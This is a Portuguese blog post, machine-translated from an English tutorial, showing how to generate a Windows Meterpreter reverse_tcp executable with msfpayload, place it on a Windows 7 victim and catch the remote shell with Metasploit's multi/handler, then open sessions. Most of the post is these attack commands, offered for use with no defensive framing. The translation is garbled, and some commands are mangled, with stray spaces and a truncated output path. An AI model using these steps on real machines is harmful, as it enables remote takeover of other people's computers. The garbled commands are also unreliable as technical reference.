segunda-feira, 23 de julho de 2012

Criando um simples Exploit hack usando Metasploit para Windows 7

NOTA: "Vou ficar devendo um passo a passo melhor traduzido e exlicado pois estou sem o Backtrack em minha máquina para acompanhar o tutorial e traduzí-lo melhor. Para aumentar a imagem basta clicar sobre ela. Att, Guilherme."

O tutorial de hoje vamos aprender como criar um exploit simples (fácil de criar e de fácil implementação :-) ) E como se conectar ao Windows 7 que já vítima executada a nossa exploração simples ... simples não é?

Ok, vamos iniciar o tutorial.
Requisitos: 

1. Metasploit Framework
2. Windows XP ea versão anterior do Windows (eu uso o Windows 7 SP1)

Passo a passo:
FYI neste tutorial eu uso Backtrack R2 5 com Metasploit Framework 4.2.0, e meu endereço IP é 192.168.8.91. 1. Abra o seu console, o terminal e digite o seguinte comando:

msfpayload windows / Meterpreter / reverse_tcp LHOST = 192.168.8.91 X> Desktop/


O comando acima irá criar arquivo executável do Windows com o "v4L.exe" nome e será salvo no seu desktop.
2. Agora você precisa copiar o v4L.exe recém-criado para o seu sistema Windows 7. Se você não sabe como compartilhar sua recuar 5 pasta, você pode videw o tutorial de como compartilhar pasta no seu Backtrack ( ver tutorial aqui ).
3. O próximo passo que precisamos para criar um manipulador para manipular a conexão que veio ao nosso sistema de exploração Backtrack simples já criamos antes. Abra seu console Metasploit, veja a foto e digite o seguinte comando:

Informações:

use exploit/multi/handler --> use the metasploit handler

set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1)

set lhost 192.168.8.91 --> set our local IP address that will catch the reverse connection

exploit -j -z --> start the handler


4. Agora você pode tentar executar o exploit simples já copiar para o Windows 7 e ver se o nosso manipulador de receber algo ou não. Abaixo foi o screenshot do meu manipulador quando o Windows 7 executou o exploit simples:


Eu uso sessions -l para listar cada sessões que já abertos lá.

5. Para interagir com a sessão disponível, você pode usar sessions -i . De lá você pode fazer outro comando que você deseja.


fonte: http://vishnuvalentino.com/hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/

Traduzido com Google Translator.

Nota:

0 comentários:

Postar um comentário

Proibido palavras ofensivas, racistas ou descriminatórias.

[Seu Comentário será liberado no máximo em 24horas]